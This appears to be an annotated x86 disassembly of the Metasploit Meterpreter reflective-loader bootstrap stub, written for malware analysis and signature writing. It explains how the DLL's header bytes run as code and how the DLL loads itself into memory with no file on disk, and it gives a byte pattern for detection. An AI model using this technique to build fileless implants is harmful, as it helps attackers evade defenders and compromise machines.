; meterpreter stage: the reflective-loader bootstrap stub at the very start of the metsrv DLL image.
; This is a debugger disassembly dump (address / opcode bytes / Intel-syntax mnemonic), x86 32-bit,
; Windows -- not assemblable source. Image base in this capture is 003d0000.
; Key idea: the stager jumps to offset 0 of the raw DLL. The 'M','Z' signature bytes (4d 5a) are
; themselves valid instructions, so the PE header doubles as the entry code, and the DLL maps itself
; with no LoadLibrary and no file on disk.
; Detection note: the leading bytes shown here (4d 5a e8 00 00 00 00 5b 52 45 55 89 e5) and the
; add/call/add/mov/push/push/push/call skeleton are fixed; only the two add-ebx immediates
; (1364h, 2A695h) are build-specific, so match on the skeleton with those wildcarded, not on the offsets.
; References:
; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/meterpreter_loader.rb
; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reflectivedllinject.rb
; http://imosin.com/2017/12/22/meterpreter-think/
; https://www.freebuf.com/articles/system/53818.html
; https://bbs.pediy.com/thread-247616.htm
003d0000 4d dec ebp ; 'M' (0x4d) of the MZ signature executed as code; undone by the inc at 003d0009
003d0001 5a pop edx ; 'Z' (0x5a); pops one dword off the stack, undone by the push at 003d0008
003d0002 e800000000 call 003d0007 ; call to the next instruction: pushes 003d0007 (classic get-PC idiom)
003d0007 5b pop ebx ; ebx = image base + 7 (its own address); the only position-dependent value the stub needs
003d0008 52 push edx ; put back the dword the 'Z' pop removed, so the stack is exactly as the stager left it
003d0009 45 inc ebp ; undo the 'M' dec; ebp holds the stager's value again
003d000a 55 push ebp
003d000b 89e5 mov ebp,esp ; conventional frame setup before calling into compiled code
003d000d 81c364130000 add ebx,1364h ; ebx = base + 7 + 1364h = absolute address of ReflectiveLoader(); per the references this immediate is patched per build by the framework
003d0013 ffd3 call ebx ; ReflectiveLoader() maps the DLL into memory by hand; per the references it returns the address of DllEntryPoint in eax. ebx and edi are expected to survive the call (callee-saved under the Win32 C conventions) -- the next two instructions rely on that
003d0015 81c395a60200 add ebx,2A695h ; ebx += 2A695h (-> base + 2BA00h): a spot in the loaded image's .data used as the _MetsrvConfig storage, per the references; build-specific immediate
003d001b 893b mov dword ptr [ebx],edi ; _MetsrvConfig->session->comms_handle = edi; edi carries the SOCKET the stage0 stager established (stager/stage contract, see references)
003d001d 53 push ebx ; arg3 lpReserved = pointer to the _MetsrvConfig block
003d001e 6a04 push 4 ; arg2 fdwReason = 4 = DLL_METASPLOIT_ATTACH (Metasploit-specific; the standard DLL_PROCESS_ATTACH is 1)
003d0020 50 push eax ; arg1 hinstDLL = the value ReflectiveLoader() returned, reused here as the handle argument
003d0021 ffd0 call eax ; DllEntryPoint(hinstDLL, DLL_METASPLOIT_ATTACH, config); stdcall, so the callee removes the three args. The capture ends here